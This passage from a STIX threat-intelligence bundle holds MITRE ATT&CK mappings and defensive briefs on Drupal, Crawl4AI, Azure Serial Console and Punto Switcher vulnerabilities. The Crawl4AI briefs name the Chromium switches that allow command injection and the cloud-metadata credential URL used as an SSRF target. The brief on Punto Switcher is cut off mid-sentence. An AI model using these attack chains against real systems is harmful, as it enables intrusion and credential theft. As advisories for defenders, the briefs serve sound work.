          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55204"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/haproxy/haproxy/commit/9a6d1fe3f00d86ab4ea6ea6ea0a5d48fc058a513"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/haproxy-null-pointer-dereference-in-hpack-dht-insert-function"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c9fdaf0c-dd16-5317-b194-2308e9d14c7f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--665d8906-4cb9-586f-bf92-19cbdef2e12a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f17f78ca-0c7b-5857-be73-7334e79dd97e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3c1f0917-3e1b-527e-b210-0aceddc792b8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38eb9e24-f0e1-56c1-a1db-5b51750dc962",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7518f353-4293-5e51-81c9-7e4fae84fabe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24648c24-a0a0-5961-ad26-ccfa3c15d674",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--12c4ed4c-16dd-5a00-9950-d4bf59bac2f4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Drupal Security Advisory AV26-615: Multiple Critical Vulnerabilities",
      "description": "## Overview\n\nOn June 17, 2026, the Canadian Centre for Cyber Security (CCCS) issued an alert (AV26-615) highlighting critical security advisories published by Drupal. These advisories address multiple vulnerabilities across Drupal core and specific modules, including Plotly.js Graphing (versions prior to 3.0.2), Flag attendance field (versions prior to 8.x-1.2), and Formatter Field (versions prior to 2.0.0). These vulnerabilities could enable remote attackers to gain unauthorized access, execute arbitrary code, or manipulate data on affected Drupal instances. While the advisories do not detail specific exploitation in the wild, the criticality rating indicates a significant risk to organizations using these versions. Defenders are urged to apply the necessary updates immediately to prevent potential compromise.\n\n## Attack Chain\n\nThe following describes a typical attack chain for exploiting web application vulnerabilities of the type disclosed in the Drupal advisories, outlining the potential sequence of events if the identified vulnerabilities were leveraged by an attacker:\n\n1.  **Initial Reconnaissance**: An attacker identifies publicly accessible Drupal instances and uses automated tools to fingerprint their versions and installed modules to identify potential vulnerabilities.\n2.  **Vulnerability Identification**: The attacker determines if the target Drupal core or any of the specified modules are running unpatched, vulnerable versions.\n3.  **Exploitation (Initial Access)**: A specially crafted HTTP request or input is sent to the vulnerable Drupal application, exploiting a flaw (e.g., remote code execution, SQL injection, authentication bypass) to gain initial unauthorized access.\n4.  **Webshell Deployment**: Upon successful initial access, the attacker uploads a webshell (e.g., PHP file) to a web-accessible directory on the server, establishing persistent remote command execution capabilities.\n5.  **Privilege Escalation**: The attacker uses the webshell to execute commands that attempt to elevate privileges on the underlying operating system of the Drupal server, moving from the web server user to root or administrator.\n6.  **Internal Reconnaissance \u0026 Lateral Movement**: From the compromised server, the attacker performs internal reconnaissance to discover sensitive data, credentials, or other connected systems, potentially leading to lateral movement within the network.\n7.  **Data Exfiltration**: The attacker locates and exfiltrates sensitive information such as user databases, configuration files, intellectual property, or other valuable data from the server or connected resources.\n8.  **System Impairment/Defacement**: The attacker may deface the website, inject malicious content, or impair the functionality of the Drupal application, potentially disrupting services or using the platform for further attacks.\n\n## Impact\n\nSuccessful exploitation of these critical Drupal vulnerabilities could lead to significant consequences for affected organizations. Potential impacts include unauthorized access to sensitive data, such as user credentials, personal information, or proprietary business data, leading to data breaches and regulatory fines. Attackers could deface websites, inject malicious content, or compromise the integrity of web applications, damaging brand reputation and user trust. Furthermore, a compromised Drupal server can be used as a platform for launching further attacks against internal networks or other external targets, expanding the scope of the incident.\n\n## Recommendation\n\n-   Immediately apply the necessary security updates for Drupal core and the affected modules (Plotly.js Graphing, Flag attendance field, Formatter Field) as detailed in the Drupal Security Advisories referenced.\n-   Deploy and configure a Web Application Firewall (WAF) to detect and block common web attack patterns, such as those that could exploit these types of vulnerabilities.\n-   Enable comprehensive logging for your web servers (e.g., Apache, Nginx access and error logs) and monitor for suspicious requests indicative of exploitation attempts, as described in the `Webserver Exploitation Attempt - Generic Web Attack Patterns` rule.\n-   Implement endpoint detection and response (EDR) solutions on web servers to monitor for unusual process creation originating from web server processes, like those covered by the `Suspicious Process Spawned by Web Server` rule.\n-   Monitor file system integrity and log file writes to web-accessible directories for unexpected file creations, especially for executable web scripts, which could indicate webshell deployment as covered by the `Webshell File Creation in Web Root` rule.\n",
      "published": "2026-06-18T17:38:54Z",
      "labels": [
        "web-application",
        "drupal",
        "vulnerability",
        "cccs-advisory"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://cyber.gc.ca/en/alerts-advisories/drupal-security-advisory-av26-615"
        },
        {
          "source_name": "reference",
          "url": "https://www.drupal.org/security"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--37d26444-a9a6-5207-8d1c-16c107361dc1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f42b14b1-471e-5c32-8536-7157aa233ff3",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e024fac-888f-5092-9432-af9883fa66c9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f42b14b1-471e-5c32-8536-7157aa233ff3",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f42b14b1-471e-5c32-8536-7157aa233ff3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Crawl4AI Unauthenticated RCE via Chromium Launch-Argument Injection",
      "description": "## Overview\n\nA critical unauthenticated remote code execution (RCE) vulnerability exists in Crawl4AI, affecting versions up to 0.8.9, where the Docker API server improperly processes `browser_config.extra_args` from untrusted request bodies. This flaw allows an attacker to inject Chromium launch arguments, specifically those that can replace child-process launch commands like `--utility-cmd-prefix`, `--renderer-cmd-prefix`, `--gpu-launcher`, or `--browser-subprocess-path`, when combined with `--no-zygote`. By leveraging these arguments, Chromium is forced to fork and execute an attacker-controlled command as the container's runtime user, leading to full compromise. The vulnerability stems from an incomplete denylist approach in earlier versions, which failed to cover critical command execution switches. If exploited, an attacker gains complete control over the container, including access to sensitive application data, mounted secrets, environment variables, and tokens, enabling out-of-band data exfiltration.\n\n## Attack Chain\n\n1.  An attacker identifies an exposed and unauthenticated Crawl4AI Docker API endpoint.\n2.  The attacker sends an unauthenticated HTTP POST request to a vulnerable API path, such as `/crawl`, `/crawl/stream`, or `/crawl/job`.\n3.  The request body includes `browser_config.extra_args` containing specially crafted Chromium launch arguments.\n4.  Malicious arguments typically include a child-process launch command (e.g., `--utility-cmd-prefix`) combined with `--no-zygote`.\n5.  The Crawl4AI application passes these arguments to Chromium during its launch configuration.\n6.  Chromium, influenced by the injected arguments, forks and executes an attacker-controlled command instead of its intended child process.\n7.  The attacker's command executes as the container's runtime user, achieving remote code execution.\n8.  Post-exploitation, the attacker can access sensitive data, exfiltrate information, or establish further persistence within the compromised container.\n\n## Impact\n\nSuccessful exploitation of this vulnerability leads to unauthenticated remote code execution (RCE) as the container's runtime user. This grants attackers full read/write access to all application data, mounted secrets, environment variables, and security tokens within the affected container. Attackers can exfiltrate sensitive data out-of-band, install additional malware, or pivot to other systems. Organizations using vulnerable Crawl4AI Docker deployments are at severe risk of data breaches, system compromise, and significant operational disruption.\n\n## Recommendation\n\n*   **Upgrade Crawl4AI to version 0.9.0 immediately** to address the fundamental trust boundary issue that allows injection of dangerous configuration.\n*   **Enable authentication** by configuring `CRAWL4AI_API_TOKEN` and restrict API access to trusted networks and users.\n*   **Run Crawl4AI containers with a restrictive seccomp profile** to limit the ability of processes within the container to execute helper binaries, mitigating the impact of potential RCE.\n*   **Deploy the Sigma rules in this brief** to your SIEM for detection of exploitation attempts and post-exploitation activity.\n*   **Ensure process creation logging is enabled for Linux containers** to allow detection of suspicious `chromium` child processes.\n",
      "published": "2026-06-18T17:40:10Z",
      "labels": [
        "RCE",
        "web-vulnerability",
        "Chromium",
        "container",
        "Docker",
        "Linux"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-r253-r9jw-qg44"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf19c461-46fa-5056-8b67-492da1636acc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--98e2fbe1-2357-568c-88b8-48e3dc2a912f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--25515e1b-9d0e-52cb-be3f-39b976615b23",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Network Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1590",
          "url": "https://attack.mitre.org/techniques/T1590"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1f944bc5-14df-517c-a2e8-b1f109c7485d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--98e2fbe1-2357-568c-88b8-48e3dc2a912f",
      "target_ref": "attack-pattern--25515e1b-9d0e-52cb-be3f-39b976615b23"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9bd0efc0-5309-5758-9535-fce73de0be57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--98e2fbe1-2357-568c-88b8-48e3dc2a912f",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--98e2fbe1-2357-568c-88b8-48e3dc2a912f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Crawl4AI Unauthenticated SSRF in Docker API `crawl/stream` Endpoint",
      "description": "## Overview\n\nA remote, unauthenticated attacker can exploit an unpatched Server-Side Request Forgery (SSRF) vulnerability in the Crawl4AI Docker API server, specifically targeting versions up to 0.8.9. The vulnerability exists because the `handle_stream_crawl_request` function, used by `POST /crawl/stream` and `POST /crawl` with `crawler_config.stream=true`, fails to validate the destination of provided seed URLs. This oversight allows attackers to supply URLs pointing to internal networks, private IP addresses, or cloud-metadata endpoints (e.g., `http://169.254.169.254/`). The server then fetches the content from these internal resources and streams the response directly back to the attacker, potentially leading to unauthorized access to sensitive information like cloud IAM credentials or details about internal services. This critical flaw highlights a gap in the API's security checks, which was previously intended to prevent such attacks on non-streaming paths but was overlooked for streaming functionalities. The Docker API is often unauthenticated by default, increasing the attack surface.\n\n## Attack Chain\n\n1.  Attacker identifies an internet-facing Crawl4AI Docker API server (version \u003c= 0.8.9).\n2.  Attacker crafts an unauthenticated `POST` request targeting the `/crawl/stream` endpoint, or the `/crawl` endpoint with `crawler_config.stream=true`.\n3.  Within the request body, the attacker includes a malicious seed URL pointing to an internal, private, or link-local address, such as `http://169.254.169.254/latest/meta-data/`.\n4.  The Crawl4AI server's `handle_stream_crawl_request` function processes the request without applying the necessary `validate_url_destination` check.\n5.  The server initiates an outbound connection to the specified internal URL, fetching the content of the internal resource (e.g., cloud instance metadata).\n6.  The fetched response body (e.g., AWS IAM temporary credentials) is then streamed back by the Crawl4AI server to the unauthenticated attacker's client.\n7.  The attacker receives and extracts sensitive internal information or credentials from the streamed response.\n8.  Attacker potentially uses the obtained credentials to escalate privileges or access other internal cloud resources.\n\n## Impact\n\nThis unauthenticated Server-Side Request Forgery (SSRF) allows remote attackers to read arbitrary internal services and cloud-metadata endpoints. This can expose highly sensitive information such as cloud IAM temporary credentials (e.g., from `http://169.254.169.254/latest/meta-data/iam/security-credentials/`), internal network topology, or other confidential data hosted on inaccessible internal systems. The vulnerability is considered high severity due to its unauthenticated nature and direct access to internal resources, which is similar in class and impact to previously identified SSRF flaws in the project. Successful exploitation could lead to privilege escalation, data exfiltration, or broader compromise of cloud environments.\n\n## Recommendation\n\n*   Upgrade Crawl4AI instances to version 0.9.0 or later to patch the SSRF vulnerability.\n*   Enable authentication on the Crawl4AI Docker API and restrict access to authorized users/systems only.\n*   Implement egress filtering or network segmentation to restrict outbound network access from Crawl4AI containers, preventing connections to internal or metadata service IP ranges like `169.254.169.254`.\n*   Deploy the provided Sigma rules to your SIEM to detect attempts at exploiting the `/crawl/stream` or `/crawl` (with `crawler_config.stream=true`) endpoints with internal IP addresses.\n*   Ensure webserver access logs are enabled and ingested into your SIEM for the Crawl4AI application to allow detection of malicious `POST` requests targeting `/crawl/stream` or `/crawl`.\n",
      "published": "2026-06-18T17:41:17Z",
      "labels": [
        "ssrf",
        "web-application",
        "docker",
        "unauthenticated",
        "api-exploitation"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--25515e1b-9d0e-52cb-be3f-39b976615b23",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-wm69-2pc3-rmmf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a282e57-3220-5126-8883-b3ba1a299c02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fd593317-85d6-5eb7-8959-58845eddae87",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--02c0255c-cfa9-5f5d-8e12-7070e113685a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fd593317-85d6-5eb7-8959-58845eddae87",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--e5546c86-d8e8-5294-847e-cedb99887b0d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unspecified"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--556e21e0-799c-51df-b837-af93b722837b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--fd593317-85d6-5eb7-8959-58845eddae87",
      "target_ref": "threat-actor--e5546c86-d8e8-5294-847e-cedb99887b0d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fd593317-85d6-5eb7-8959-58845eddae87",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Azure VM Serial Console Exploitation for Lateral Movement",
      "description": "## Overview\n\nThis brief details the threat of adversaries leveraging the Azure VM Serial Console for unauthorized access and lateral movement within Azure environments. The Serial Console provides text-based console access to a virtual machine (VM) via its boot diagnostics serial port, operating independently of the VM's network state. This out-of-band access mechanism allows attackers to bypass crucial network security controls, including Network Security Groups (NSGs) and Just-in-Time (JIT) access policies. An adversary possessing a privileged Azure Role-Based Access Control (RBAC) role, such as Virtual Machine Contributor, and targeting a VM with enabled boot diagnostics, can exploit this capability to obtain interactive sessions with SYSTEM (Windows) or root (Linux) privileges. Detection strategies focus on identifying anomalous connections by monitoring for unobserved combinations of user identities and source Autonomous System Numbers (ASNs) connecting to the Serial Console, indicative of potential malicious activity.\n\n## Attack Chain\n\n1.  Adversary gains initial access to Azure credentials, potentially through phishing, compromised identity, or misconfigured service principal.\n2.  Adversary identifies target Azure Virtual Machines within their accessible scope that have boot diagnostics enabled.\n3.  Adversary identifies or establishes sufficient Azure RBAC permissions (e.g., Virtual Machine Contributor) on the target VM or its containing resource group/subscription.\n4.  Adversary initiates a connection to the Azure VM Serial Console for the chosen target VM.\n5.  The Serial Console connection is successfully established, effectively bypassing any configured Network Security Groups (NSGs) or Just-in-Time (JIT) access policies.\n6.  Adversary gains an interactive session with SYSTEM (on Windows VMs) or root (on Linux VMs) privileges.\n7.  Adversary performs host-based reconnaissance, establishes persistence, deploys additional malware, or exfiltrates sensitive data from the compromised VM.\n8.  Adversary uses the compromised VM as a pivot point for lateral movement to other resources within the Azure environment.\n\n## Impact\n\nSuccessful exploitation of the Azure VM Serial Console by an adversary results in full SYSTEM or root-level compromise of the targeted virtual machine. This bypasses critical network security controls, allowing unauthorized interactive access to a VM even if it's isolated or unreachable via standard network protocols. The impact includes potential data exfiltration, deployment of malicious payloads (e.g., ransomware, backdoors), establishment of persistence, and lateral movement throughout the victim's Azure infrastructure, leading to broader organizational compromise and significant operational disruption. While specific victim counts are not provided in the source, any organization leveraging Azure VMs with vulnerable configurations and exposed privileged credentials is at risk.\n\n## Recommendation\n\n*   Deploy the provided Sigma rules for \"Azure VM Serial Console Connection\" and \"Azure RBAC Role Assignment\" to your SIEM system.\n*   Enable comprehensive Azure Activity Log auditing for `MICROSOFT.SERIALCONSOLE/SERIALPORTS/CONNECT/ACTION` and `MICROSOFT.AUTHORIZATION/ROLEASSIGNMENTS/WRITE` operations.\n*   Baseline legitimate Serial Console usage by authorized administrators and their known source ASNs and principal IDs to reduce false positives for the \"Azure VM Serial Console Connection\" rule.\n*   Review all high-risk alerts from the \"Azure VM Serial Console Connection\" rule by investigating `azure.activitylogs.identity.authorization.evidence.principal_id` and `source.as.organization.name`.\n*   Implement strong Conditional Access policies and Multi-Factor Authentication (MFA) for all Azure administrative roles to mitigate initial access attempts.\n*   Periodically review and prune Azure RBAC role assignments, especially for high-privilege roles like 'Virtual Machine Contributor', for the \"Azure RBAC Role Assignment for Virtual Machine Contributor\" rule.\n*   Disable the subscription-level Serial Console where it is not operationally required to reduce attack surface.\n",
      "published": "2026-06-18T18:42:34Z",
      "labels": [
        "cloud",
        "azure",
        "lateral-movement",
        "defense-evasion",
        "initial-access",
        "vm"
      ],
      "object_refs": [
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "threat-actor--e5546c86-d8e8-5294-847e-cedb99887b0d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview"
        },
        {
          "source_name": "reference",
          "url": "https://blog.pwnedlabs.io/diving-deep-into-azure-vm-attack-vectors"
        },
        {
          "source_name": "reference",
          "url": "https://www.netspi.com/blog/technical-blog/adversary-simulation/7-ways-to-execute-command-on-azure-virtual-machine-virtual-machine-scale-sets/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4fd178b-6cdf-5f1a-827f-5710979ffab9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b0bf4482-8103-5c3e-b2c7-a8df2c33f645",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b0bf4482-8103-5c3e-b2c7-a8df2c33f645",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-25865: Punto Switcher Unquoted Search Path Vulnerability",
      "description": "## Overview\n\nA critical local arbitrary code execution vulnerability, identified as CVE-2026-25865, affects Yandex Punto Switcher versions up to and including 4.5.0.583. This flaw stems from an unquoted search path element vulnerability where the application makes an insecure call to `WinExec` for `RunDll32.exe` without specifying a fully qualified path when invoking `shell32.dll Control_RunDLL input.dll`. This allows a local attacker, with minimal privileges, to craft and place a malicious executable named `RunDll32.exe` in a directory that is prioritized in the system's PATH environment variable. When Punto Switcher attempts to launch the legitimate `RunDll32.exe`, it instead executes the attacker-controlled binary, leading to arbitrary code execution in the context of the currently logged-in user. This vulnerability presents a significant risk for privilege escalation and persistent access on affected Windows systems.\n\n## Attack Chain\n\n1.  **Initial Access:** An attacker gains local access to a system with an unpatched Punto Switcher installation (e.g., via social engineering, a prior low-privilege exploit, or physical access).\n2.  **Vulnerability Discovery:** The attacker identifies the Punto Switcher process's insecure call to `WinExec(\"RunDll32.exe shell32.dll Control_RunDLL input.dll\")`.\n3.  **Payload Creation:** The attacker creates a malicious executable file and names it `RunDll32.exe`. This payload can perform actions such as establishing persistence, escalating privileges, or exfiltrating data.\n4.  **Path Manipulation:** The attacker places their malicious `RunDll32.exe` in a directory (e.g., a user-writable folder) that is listed *before* `C:\\Windows\\System32` in the system's 